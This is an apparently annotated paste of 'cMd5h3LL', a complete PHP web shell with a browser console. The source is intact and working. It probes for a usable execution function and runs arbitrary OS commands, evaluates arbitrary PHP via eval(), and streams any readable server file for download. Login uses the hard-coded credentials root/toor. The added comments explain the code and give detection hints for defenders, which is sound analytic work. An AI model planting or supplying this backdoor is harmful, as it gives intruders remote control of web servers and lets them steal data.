r13y5h4

cMd5h3LL

May 26th, 2014
  1. <?php
  2.  
  // Start-up section of a password-gated PHP web shell, followed by its file-download handler.
  // error_reporting(0) silences every PHP notice and warning, so faults in the shell never
  // show up in the rendered page.
  3. error_reporting(0);
  4. session_start();
  5.  
  // Operator settings. The login name and password are plaintext literals in the file, so
  // anyone able to read this file holds working credentials for the shell.
  6. $config_command_prefix = "$";
  7. $config_username = "root";
  8. $config_password = "toor";
  9. $config_welcome = "<br />Welcome! (type help if you are lost)<br />";
  // The page posts back to itself under whatever file name it was saved as.
  10. $config_file = basename(__FILE__);
  11.  
  12. $config_command_prefix = '<span class="prefix">' . $config_command_prefix . '</span>';
  13.  
  // File download: once the session carries the loggedin flag, a GET request with ?file=PATH
  // streams that path back as an attachment. basename() is applied only to the file name in
  // the Content-Disposition header; readfile() receives the path as sent, so any file the PHP
  // process can read is in scope. For triage: requests to this script carrying a `file` query
  // parameter and answered with "Content-Description: File Transfer" indicate file retrieval.
  14. if($_SESSION['terminal']['loggedin'] && isset($_GET['file'])){
  15. $file = trim($_GET['file']);
  16. header('Content-Description: File Transfer');
  17. header('Content-Disposition: attachment; filename='.basename($file));
  18. header('Content-Length: ' . filesize($file));
  19. readfile($file);
  20. exit();
  21. }
  22.  
  // Request dispatcher: every POST carrying an `action` field is answered with JSON, and the
  // script exits before any HTML is sent. response() itself calls exit(), so each branch
  // below that reaches response() ends the request there; statement order is significant.
  // Traffic shape for detection: a POST to the script's own file name with action=init, or
  // with action=command plus `command` and `line` fields, answered by a JSON object holding
  // `code`, `error` and `data`.
  23. if(isset($_POST['action'])){
  24. switch($_POST['action']){
  25.  
  26. case 'command':
  27. if(isset($_POST['command'])){
  28.  
  // Strip the HTML prompt prefix, then return the command both raw and with a keyword span.
  29. $command = trim(str_replace($config_command_prefix, '', $_POST['command']));
  30. $data['command'] = $command;
  31. $data['color_command'] = color_command($command);
  32.  
  // strstr() matches anywhere in the string, so any command containing "exit" destroys the
  // session; code 220 makes the client reload the page.
  33. if(strstr($command, 'exit')){
  34. session_destroy();
  35. $data['result'] = "You are know logged out \n";
  36. response($data, 220);
  37. }
  38.  
  // Login, step 1. Which step runs is decided by the client-supplied `line` field (the last
  // console line as the browser saw it), not by server-side state. The comparison is a
  // loose == against the hard-coded literal.
  39. if(strstr($_POST['line'], 'username: ')){
  40. $user = trim(str_replace('username: ', '', $command));
  41. if($user == $config_username){
  42. $_SESSION['terminal']['username'] = $user;
  43. response($data, 300);
  44. }else{
  45. response($data, 310, "Incorrect username");
  46. }
  47. }
  48.  
  // Login, step 2: a matching password sets the loggedin flag; the password value itself is
  // also written into the session data.
  49. if(strstr($_POST['line'], 'password: ')){
  50. $pass = trim(str_replace('password: ', '', $command));
  51. if($pass == $config_password){
  52. $_SESSION['terminal']['password'] = $pass;
  53. $_SESSION['terminal']['loggedin'] = true;
  54. response($data, 320);
  55. }else{
  56. response($data, 330, "Incorrect password");
  57. }
  58. }
  59.  
  // Authentication gate for everything below. Because of the &&, the check denies only when
  // the flag is absent from the session; the only assignment visible in this file sets it
  // to true.
  60. if(!isset($_SESSION['terminal']['loggedin']) && !$_SESSION['terminal']['loggedin']){
  61. response($data, 400, "Permission denied");
  62. }
  63.  
  // cd: the working directory exists only as a string in the session. The requested path is
  // appended to the stored one and normalised by compress_path(); nothing here checks that
  // the directory exists.
  64. if(strstr($command, 'cd ')){
  65. $path = trim(str_replace('cd ', '', $command));
  66. $_SESSION['terminal']['path'] = compress_path($_SESSION['terminal']['path'] . '/' . $path);
  67. $data['result'] = "";
  68. $data['path'] = $_SESSION['terminal']['path'];
  69. response($data);
  70. }
  71.  
  // func: reports whether a named PHP function exists on the host.
  72. if(strstr($command, 'func ')){
  73. $function = trim(str_replace('func ', '', $command));
  74. $data['result'] = function_exists( $function ) ? "exist" : "doesn't exist";
  75. response($data);
  76. }
  77.  
  // exec: despite the name this is PHP eval() of operator-supplied source, i.e. arbitrary PHP
  // execution in the web server's context. Whatever the code echoes is captured from the
  // output buffer and returned in the JSON reply.
  78. if(strstr($command, 'exec ')){
  79. $code = trim(str_replace('exec ', '', $command));
  80.  
  81. ob_start();
  82. eval($code);
  83. $content = ob_get_contents();
  84. ob_clean();
  85.  
  86. $data['result'] = $content;
  87. response($data);
  88. }
  89.  
  // Anything else is handed to execute() as an operating-system command, using the PHP
  // function name recorded in the session during `init`.
  90. if($command != ""){
  91. $data['result'] = execute($command, $_SESSION['terminal']['function']);
  92. response($data);
  93. }else{
  94. response($data, 400, 'Empty command');
  95. }
  96.  
  97. }
  98. break;
  99.  
  // init: on first contact, probe for a usable command-execution function and remember its
  // name in the session. $commander is assigned only inside the if, so on later init calls
  // the `commander` field is taken from an unset variable. The reply also tells the client
  // whether this session is already logged in.
  100. case 'init':
  101. if(!isset($_SESSION['terminal']['function']) || $_SESSION['terminal']['function'] == ''){
  102. $commander = getValidCommandFunction();
  103. $_SESSION['terminal']['function'] = $commander;
  104. }
  105. sleep(1);
  106.  
  107. $data['commander'] = $commander;
  108. $data['loggedin'] = isset($_SESSION['terminal']['loggedin']) && $_SESSION['terminal']['loggedin'] ? true : false;
  109. response($data);
  110. break;
  111. }
  112. exit();
  113. }
  114.  
  /**
   * Emit the JSON reply envelope used by every AJAX answer, then end the request.
   *
   * The envelope always carries three keys in this order: `code` (status number the
   * client-side script branches on), `error` (message text) and `data` (payload).
   * This function never returns: it calls exit() after writing the JSON.
   *
   * @param mixed  $data  Payload placed under the `data` key.
   * @param int    $code  Status code placed under the `code` key (200 by default).
   * @param string $error Message placed under the `error` key (empty by default).
   */
  function response($data, $code=200, $error=""){
      $envelope = array(
          'code'  => $code,
          'error' => $error,
          'data'  => $data,
      );

      echo json_encode($envelope);
      exit();
  }
  125.  
  /**
   * Report whether the host looks like Windows, judged from phpinfo() output.
   *
   * phpinfo() is rendered into an output buffer and the HTML "System" table row is
   * searched for the word "Windows". The pattern only fits the HTML rendering of
   * phpinfo(); any other rendering yields false.
   *
   * @return bool true when the System row mentions Windows, false otherwise.
   */
  function isWindows(){
      ob_start();
      phpinfo();
      $report = ob_get_clean();

      $found = preg_match('~System </td><td class="v">([^<]*Windows)~', $report);
      if ($found) {
          return true;
      }
      return false;
  }
  132.  
  // Capability probe: finds out which PHP command-execution function works on this host.
  // A harmless listing command (dir on Windows, ls elsewhere) is run through system(),
  // exec(), passthru() and shell_exec() in that order; the name of the first one that yields
  // non-empty output not containing 'disabled for security' is returned. If none qualifies
  // the function falls off the end and returns nothing (null).
  // NOTE(review): the 'disabled for security' test presumably targets PHP's warning for
  // functions listed in disable_functions — confirm against the PHP version in use.
  // For defenders: the probe makes the web server / PHP process spawn a directory listing
  // command, which is unusual for most web applications and visible in process telemetry.
  133. function getValidCommandFunction(){
  134. $test_command = isWindows() ? 'dir' : 'ls';
  135.  
  // system() prints its output, so it is captured through an output buffer.
  136. ob_start();
  137. system($test_command);
  138. $result = ob_get_contents();
  139. ob_end_clean();
  140. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'system';
  141.  
  // exec() returns the last line of the command's output.
  142. $result = exec($test_command);
  143. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'exec';
  144.  
  // passthru() also writes straight to output, hence the buffer again.
  145. ob_start();
  146. passthru($test_command);
  147. $result = ob_get_contents();
  148. ob_end_clean();
  149. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'passthru';
  150.  
  151. $result = shell_exec($test_command);
  152. if(trim($result) != '' && !strstr($result, 'disabled for security')) return 'shell_exec';
  153.  
  154. }
  155.  
  // Runs an operator-supplied OS command through the PHP function named in $function
  // ('system', 'exec', 'passthru' or 'shell_exec') and returns the output HTML-escaped.
  //   $command  - command line as typed by the operator; passed to the shell unmodified.
  //   $function - name of the execution function to use; any other value gives $result = false.
  //   $n_to_br  - when true (default) newlines in the output are converted with nl2br().
  // For defenders: every command appears as a child process of the web server / PHP process.
  156. function execute($command, $function, $n_to_br=true){
  157.  
  // Working-directory emulation. The "current directory" is only a string kept in the
  // session: on Windows the PHP process chdir()s into it (resetting it and replying at once
  // if that fails), elsewhere "cd <path>" plus a newline is prepended to the command string.
  158. $chdir = '';
  159. if($_SESSION['terminal']['path'] != ''){
  160. if(isWindows()){
  161. if(!@chdir( $_SESSION['terminal']['path'] )){
  162. $_SESSION['terminal']['path'] = '';
  163. $data['result'] = "You are redirected back to the original directory, because it was not allowed to open this directory.";
  164. response($data);
  165. }
  166. }else{
  167. $chdir = "cd " . $_SESSION['terminal']['path'] . "\n";
  168. }
  169. }
  170.  
  171.  
  // system() and passthru() print their output, so it is collected via an output buffer;
  // exec() hands back only the last output line; shell_exec() returns the whole output.
  172. switch($function){
  173.  
  174. case 'system':
  175. ob_start();
  176. system($chdir . $command);
  177. $result = ob_get_contents();
  178. ob_end_clean();
  179. break;
  180. case 'exec':
  181. $result = exec($chdir . $command);
  182. break;
  183. case 'passthru':
  184. ob_start();
  185. passthru($chdir . $command);
  186. $result = ob_get_contents();
  187. ob_end_clean();
  188. break;
  189. case 'shell_exec':
  190. $result = shell_exec($chdir . $command);
  191. break;
  192. default:
  193. $result = false;
  194. break;
  195. }
  196.  
  // Command output is escaped before it is sent to the browser console.
  197. return $n_to_br ? nl2br( htmlspecialchars( $result )) : htmlspecialchars($result);
  198.  
  199. }
  200.  
  /**
   * Normalise a path string kept in the session as the shell's working directory.
   *
   * Backslashes become forward slashes, runs of four, three and two slashes are
   * collapsed (in that order, one pass each), and a single leading slash is removed.
   * The path is treated purely as text; the filesystem is never consulted.
   *
   * @param string $path Raw path text.
   * @return string Normalised path without a leading slash.
   */
  function compress_path($path){
      $normalised = str_replace('\\', '/', $path);

      // One pass per run length, longest first, exactly as str_replace() does with an array.
      foreach (array('////', '///', '//') as $slashRun) {
          $normalised = str_replace($slashRun, '/', $normalised);
      }

      return strncmp($normalised, '/', 1) === 0
          ? substr($normalised, 1)
          : $normalised;
  }
  211.  
  /**
   * Wrap the first space-separated word of a command in a "keyword" span for display.
   *
   * The command text is inserted into the markup as given (no HTML escaping); the
   * client script later writes the returned string into the page.
   *
   * @param string $command Command line as typed.
   * @return string The command with its first word wrapped in <span class="keyword">.
   */
  function color_command($command){
      // Only the first word changes, so splitting once at the first space is enough.
      $pieces = explode(' ', $command, 2);
      $keyword = '<span class="keyword">' . $pieces[0] . '</span>';

      if (count($pieces) > 1) {
          return $keyword . ' ' . $pieces[1];
      }
      return $keyword;
  }
  217.  
  218. ?>
  219.  
  220. <html>
  221. <head>
  222. <title>Shell</title>
  223. <meta name="viewport" content="width=device-width">
  224. <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js" type="text/javascript"></script>
  225. <style>
  226. body{
  227. text-align: center;
  228. font-size: 11px;
  229. font-family: verdana;
  230. background-color: #000000;
  231. }
  232. table {
  233. width: 565px;
  234. }
  235. table tr td{
  236. font-family: verdana;
  237. font-size: 11px;
  238. padding: 10px 5px;
  239. border-bottom: solid 1px #000000;
  240.  
  241. }
  242. #wrapper{
  243. width: 100%;
  244. margin: 2% auto;
  245. text-align: left;
  246. }
  247. #console{
  248. height: 84%;
  249. overflow: auto;
  250. background-color: #000000;
  251. padding: 15px;
  252. font-family: monospace;
  253. font-size: 12px;
  254. color: #1fbf00;
  255. }
  256. .content{
  257. padding: 15px;
  258. }
  259. #commander{
  260. border: solid 1px #000000;
  261. padding: 5px 10px;
  262. -webkit-border-radius: 2px;
  263. -moz-border-radius: 2px;
  264. border-radius: 2px;
  265. width: 100%;
  266. font-family: monospace;
  267. font-size: 12px;
  268. color: #1fbf00;
  269. }
  270. .box{
  271. -moz-box-shadow: 1px 1px 8px #000000;
  272. -webkit-box-shadow: 1px 1px 8px #000000;
  273. box-shadow: 1px 1px 8px #000000;
  274. border: solid 1px #000000;
  275. -webkit-border-radius: 4px;
  276. -moz-border-radius: 4px;
  277. border-radius: 4px;
  278. margin: 15px 0px;
  279. background-color: #000000;
  280. }
  281. #help{
  282. width: 300px;
  283. float: right;
  284. }
  285. .prefix{
  286. color: #0077E7;
  287. }
  288. .keyword{
  289. color: #9eff63;
  290. }
  291. .error{
  292. color: #FF0000;
  293. }
  294. .spacer{
  295. clear: both;
  296. display: block;
  297. }
  298. </style>
  299. <script type="text/javascript">
  300.  
  // Client-side state. The two PHP echoes splice server-side configuration into JavaScript
  // string literals; command_stack holds the in-page command history and
  // command_stack_position the cursor into it.
  301. var config_command_prefix = '<?php echo $config_command_prefix ?>';
  302. var config_welcome = '<?php echo $config_welcome ?>';
  303. var command_stack = Array();
  304. var command_stack_position = 0;
  305.  
  // On page load the script POSTs action=init to its own file name. The reply's loggedin
  // flag selects either the welcome text or the "username: ?" prompt, after which the input
  // box is enabled and focused.
  306. $(document).ready(function() {
  307. $.post("<?php echo $config_file; ?>", {action: 'init'}, function(response){
  308. var extra = response.data.loggedin ? ' Welcome! (type help if you are lost)' : ' username: ?';
  309. $("#console").html($("#console").html() + "<br />" + config_command_prefix + extra);
  310. $("#commander").attr('disabled', false);
  311. $("#commander").focus();
  312.  
  313. }, "json");
  314. });
  315.  
  // Key handler for the command input (wired to onkeyup in the markup).
  // Key codes 38 and 40 (arrow up / down) walk the command history; 13 (Enter) submits the
  // typed command. Returns false after submitting, true for any other key; the two history
  // branches return nothing.
  316. function execute(field,event) {
  317. var theCode = event.keyCode ? event.keyCode : event.which ? event.which : event.charCode;
  318. if(theCode == 38){
  319. if(command_stack_position > 0) command_stack_position--;
  320. $("#commander").val(command_stack[command_stack_position]);
  321. }else if(theCode == 40){
  322. if(command_stack_position < (command_stack.length-1)) command_stack_position++;
  323. $("#commander").val(command_stack[command_stack_position]);
  324. }else if (theCode == 13){
  325.  
  326. var command = $("#commander").val();
  327. $("#commander").val('');
  328.  
  329. command_stack.push( command );
  330. command_stack_position = (command_stack.length);
  331.  
  // The last console line, lower-cased, is sent to the server as `line`; the server uses it
  // to tell a username or password prompt apart from a normal command.
  332. var lines = $("#console").html().toLowerCase().split('<br>');
  333. var line = lines[lines.length-1];
  334.  
  // "download" anywhere in the command turns into a GET to ?file=<rest of the command>; the
  // value is appended to the URL without encoding.
  335. if(command.indexOf("download") > -1){
  336. var file = command.replace('download ', '');
  337. window.location = '<?php echo $config_file; ?>?file=' + file;
  338. return;
  339. }
  340.  
  // cls / clear only wipe the on-page console and never reach the server.
  341. if(command.indexOf("cls") == 0 || command.indexOf("clear") == 0){
  342. $("#console").html("");
  343. return;
  344. }
  345.  
  // Everything else goes to the server as action=command. Reply codes handled below:
  // 200 command output, 220 logged out (page reload), 300 username accepted, 310 wrong
  // username, 320 logged in, 330 wrong password; any other code is shown as an error.
  // show and result are assigned without var, so they are globals; the 220 branch does not
  // assign result.
  346. $.post("<?php echo $config_file; ?>", {action: 'command', command: command, line: line}, function(response){
  347. if(response.code == 200){
  348. show = (response.data.result == null) ? "" : response.data.result + "<br />";
  349. result = config_command_prefix + " " + response.data.color_command + "<br />" + show;
  350. }else if(response.code == 220){
  351. window.location = '<?php echo $config_file; ?>';
  352. }else if(response.code == 310){
  353. result = response.error + "<br />" + config_command_prefix + " username: ?";
  354. }else if(response.code == 320){
  355. result = config_welcome + "<br />" + config_command_prefix + " ";
  356. }else if(response.code == 330){
  357. result = response.error + "<br />" + config_command_prefix + " password: ?";
  358. }else if(response.code == 300){
  359. result = config_command_prefix + " password: ?";
  360. }else{
  361. result = '<span class="error">' + response.error + "</span><br />";
  362. }
  // Server-supplied strings are appended with .html(), i.e. interpreted as markup.
  363. $("#console").html($("#console").html() + '<br />' + result ).focus();
  364.  
  // Keep the console scrolled to the newest output.
  365. textareaelem = document.getElementById('console');
  366. textareaelem.scrollTop = textareaelem.scrollHeight;
  367.  
  368. $("#commander").focus();
  369.  
  370. }, "json");
  371. return false;
  372. }else{
  373. return true;
  374. }
  375.  
  376. }
  377.  
  378. </script>
  379.  
  380. </head>
  381. <body>
  382.  
  383. <div id="wrapper">
  384. <div class="box">
  385. <div id="console"><?php echo $config_command_prefix ?> Loading......</div>
  386. <input text="test" id="commander" onkeyup="execute(this,event);" disabled="disabled" style="background-color:#000000;" />
  387. </div>
  388.  
  389. <div class="spacer"></div>
  390. </div>
  391.  
  392. </body>
  393. </html>